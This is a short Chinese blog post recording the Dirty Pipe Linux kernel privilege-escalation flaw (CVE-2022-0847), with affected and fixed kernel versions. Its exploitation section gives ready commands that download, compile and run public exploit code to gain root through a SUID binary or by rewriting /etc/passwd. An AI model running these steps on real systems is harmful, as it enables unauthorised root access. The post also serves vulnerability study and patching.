1. 程式人生 > 其它 >Dirty-Pipe Linux核心提權漏洞(CVE-2022-0847)

Dirty-Pipe Linux核心提權漏洞(CVE-2022-0847)

前言:

划水一波,哈哈,以後復現漏洞不再直接傻瓜無腦的走流程了,首先碼字寫加構思比較麻煩且寫的不多還效率不高,現在就是當做見到了一個漏洞,在此記錄一下這個漏洞,包括其來源,簡單的描述,適用範圍,以及其具體化的利用方式(這個不會水的,~-~),最後,再加上其簡易的修復方式。好,ok啦。

描述:

CVE-2022-0847-DirtyPipe-Exploit 存在於 Linux核心 5.8 及之後版本中的本地提權漏洞。攻擊者通過利用此漏洞,可覆蓋重寫任意可讀檔案(甚至是隻讀檔案)中的資料,從而可將普通許可權的使用者提升到root許可權。CVE-2022-0847 的漏洞原理類似於 CVE-2016-5195 髒牛漏洞(Dirty Cow),但它更容易被利用,漏洞作者將此漏洞命名為Dirty Pipe。

範圍:

Linux Kernel >= 5.8
Linux Kernel < 5.16.11 / 5.15.25 / 5.10.102
可使用uname -a查詢linux系統核心

利用:

方法一:利用suid許可權執行root許可權
mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez
這個 POC 需要事先找到一個具有 SUID 許可權的可執行檔案,然後利用這個檔案進行提權
find / -perm -u=s -type f 2>/dev/null
直接 ./dirtypipez 跟上具有 SUID 許可權的檔案即可提權
比如:./dirtypipez /usr/bin/sudo
方法二:直接修改/etc/passwd檔案,進入root使用者。
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
參考:https://blog.csdn.net/weixin_45996361/article/details/123379361
https://www.cnblogs.com/andyhf/p/15984045.html

修復:

更新升級 Linux 核心到以下安全版本:
Linux 核心 >= 5.16.11
Linux 核心 >= 5.15.25
Linux 核心 >= 5.10.102